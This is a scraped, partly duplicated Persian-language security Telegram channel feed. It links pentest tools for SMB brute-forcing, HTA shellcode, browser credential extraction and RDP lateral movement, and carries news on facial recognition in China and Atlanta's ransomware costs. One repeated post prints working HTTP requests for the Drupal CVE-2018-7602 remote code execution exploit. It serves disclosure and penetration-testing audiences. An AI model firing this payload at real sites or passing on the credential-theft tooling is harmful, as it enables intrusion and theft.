بروت فورس یوزرنیم و پسوردها بر روی سرور با استفاده از SMB
github.com/m4ll0k/SMBrute
#windows
#smb
#network
#bruteforce
@sec_nerd
github.com/m4ll0k/SMBrute
#windows
#smb
#network
#bruteforce
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
اجرای شل کد با استفاده از فایلهای HTA
https://github.com/johnjohnsp1/Shellcode-Via-HTA
#windows
#network
#pentest
@sec_nerd
https://github.com/johnjohnsp1/Shellcode-Via-HTA
#windows
#network
#pentest
@sec_nerd
GitHub
GitHub - johnjohnsp1/Shellcode-Via-HTA: How To Execute Shellcode via HTA
How To Execute Shellcode via HTA. Contribute to johnjohnsp1/Shellcode-Via-HTA development by creating an account on GitHub.
تکنولوژی تشخیص چهره (facial recognition) در چین به اوج خود رسید و پلیس این کشور موفق شد یک مضنون را در بین جمعیت ۶۰ هزار نفری یک کنسرت شناسایی کند!
پلیس اعلام کرد یک مجرم فراری ۳۱ ساله را در کنسرت Jacky Cheung شناسایی و دستگیر کرد.
دوربین های بخش بررسی بلیطها به تکنولوژی تشخیص چهره مجهز بودند و این فرد به خوبی توسط دوربین ها شناسایی شد.
چین در حال حاضر ۱۷۰ میلیون دوربین مداربسته دارد و ۴۰۰ میلیون دوربین دیگر نیز قرار است طی سه سال آینده به تعداد فعلی اضافه شوند.
اکثر این دوربین ها به هوش مصنوعی و تشخیص چهره مجهز هستند.
اطلاعات بیشتر:
https://www.hackread.com/police-locate-suspect-from-a-crowd-using-facial-recognition/
#facial_recognition
#china
#privacy
@sec_nerd
پلیس اعلام کرد یک مجرم فراری ۳۱ ساله را در کنسرت Jacky Cheung شناسایی و دستگیر کرد.
دوربین های بخش بررسی بلیطها به تکنولوژی تشخیص چهره مجهز بودند و این فرد به خوبی توسط دوربین ها شناسایی شد.
چین در حال حاضر ۱۷۰ میلیون دوربین مداربسته دارد و ۴۰۰ میلیون دوربین دیگر نیز قرار است طی سه سال آینده به تعداد فعلی اضافه شوند.
اکثر این دوربین ها به هوش مصنوعی و تشخیص چهره مجهز هستند.
اطلاعات بیشتر:
https://www.hackread.com/police-locate-suspect-from-a-crowd-using-facial-recognition/
#facial_recognition
#china
#privacy
@sec_nerd
HackRead
Police locate suspect from a crowd of 60,000 using Facial Recognition
The fugitive was successfully identified from within the crowd of thousands of attendees through the facial recognition technology, which provided surprisingly accurate results.
امنیت اطلاعات
اکسپلویت Drupal منتشر شد https://isc.sans.edu/diary.html #drupal #exploit #rce @sec_nerd
SQL Injection Cheat Sheet
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
#sqli
#web
#pentest
@sec_nerd
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
#sqli
#web
#pentest
@sec_nerd
استخراج پسوردهای ذخیره شده در اینترنت اکسپلورر و edge
https://github.com/HanseSecure/credgrap_ie_edge
#windows
#edge
#browser
#ps
@sec_nerd
https://github.com/HanseSecure/credgrap_ie_edge
#windows
#edge
#browser
#ps
@sec_nerd
GitHub
GitHub - HanseSecure/credgrap_ie_edge: Extract stored credentials from Internet Explorer and Edge
Extract stored credentials from Internet Explorer and Edge - HanseSecure/credgrap_ie_edge
حرکات جانبی در شبکه های ویندوزی با استفاده از RDP
https://pentestlab.blog/2018/04/24/lateral-movement-rdp/
#windows
#network
#pivoting
#privesc
#lateral_movement
@sec_nerd
https://pentestlab.blog/2018/04/24/lateral-movement-rdp/
#windows
#network
#pivoting
#privesc
#lateral_movement
@sec_nerd
Penetration Testing Lab
Lateral Movement – RDP
The Remote Desktop Protocol (RDP) is widely used across internal networks by Administrators. This allows systems owners and admins to manage Windows environments remotely. However RDP can give vari…
شهر آتلانتا 2.6 میلیون دلار برای رهایی از یک باج افزار با نام SamSam هزینه کرده است!
این باج افزار که به جان سیستم های شهرداری این شهر افتاده است ابتدا درخواست ۵۰ هزار دلار باج کرده بود که پس از مدتی، پورتال پرداخت باج از کار افتاد.
تا کنون برای بازگردانی اطلاعات $2,667,328 پرداخت شده است!
https://www.wired.com/story/atlanta-spent-26m-recover-from-ransomware-scare/
#ransom
#ransomware
#usa
@sec_nerd
این باج افزار که به جان سیستم های شهرداری این شهر افتاده است ابتدا درخواست ۵۰ هزار دلار باج کرده بود که پس از مدتی، پورتال پرداخت باج از کار افتاد.
تا کنون برای بازگردانی اطلاعات $2,667,328 پرداخت شده است!
https://www.wired.com/story/atlanta-spent-26m-recover-from-ransomware-scare/
#ransom
#ransomware
#usa
@sec_nerd
WIRED
Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare
Whether to pay ransomware is a complicated—and costly—calculation.
بازی طراحی شده توسط CIA از حالت محرمانه خارج شد.
این بازی که برای آموزش تحلیلگران CIA ساخته شده بود به تازگی از طبقه بندی محرمانه خارج و برای عموم در دسترس قرار گرفت.
بازی به این شکل است که بیش از ۱۵۰ کارت داریم و هر بازیکن باید برای هر دور، ایده هایی را برای خروج از بحران پیشنهاد کند.
بحرانها از جنس سیاسی، نظامی، اقتصادی و سلاح و ... هستند.
اطلاعات بیشتر:
https://www.kickstarter.com/projects/mmasnick/cia-collect-it-all
#cia
#Usa
#agents
@sec_nerd
این بازی که برای آموزش تحلیلگران CIA ساخته شده بود به تازگی از طبقه بندی محرمانه خارج و برای عموم در دسترس قرار گرفت.
بازی به این شکل است که بیش از ۱۵۰ کارت داریم و هر بازیکن باید برای هر دور، ایده هایی را برای خروج از بحران پیشنهاد کند.
بحرانها از جنس سیاسی، نظامی، اقتصادی و سلاح و ... هستند.
اطلاعات بیشتر:
https://www.kickstarter.com/projects/mmasnick/cia-collect-it-all
#cia
#Usa
#agents
@sec_nerd
Kickstarter
CIA: Collect It All
A competitive card game based on the CIA's declassified training game: Collection Deck.
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
#drupal
#exploit
#rce
@sec_nerd
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
#drupal
#exploit
#rce
@sec_nerd
اسکریپتهای پاورشل مفید برای انجام تست نفوذ در سیستمهای ویندوزی
https://github.com/rvrsh3ll/Misc-Powershell-Scripts
#ps
#windows
#network
#privesc
@sec_nerd
https://github.com/rvrsh3ll/Misc-Powershell-Scripts
#ps
#windows
#network
#privesc
@sec_nerd
GitHub
GitHub - rvrsh3ll/Misc-Powershell-Scripts: Random Tools
Random Tools. Contribute to rvrsh3ll/Misc-Powershell-Scripts development by creating an account on GitHub.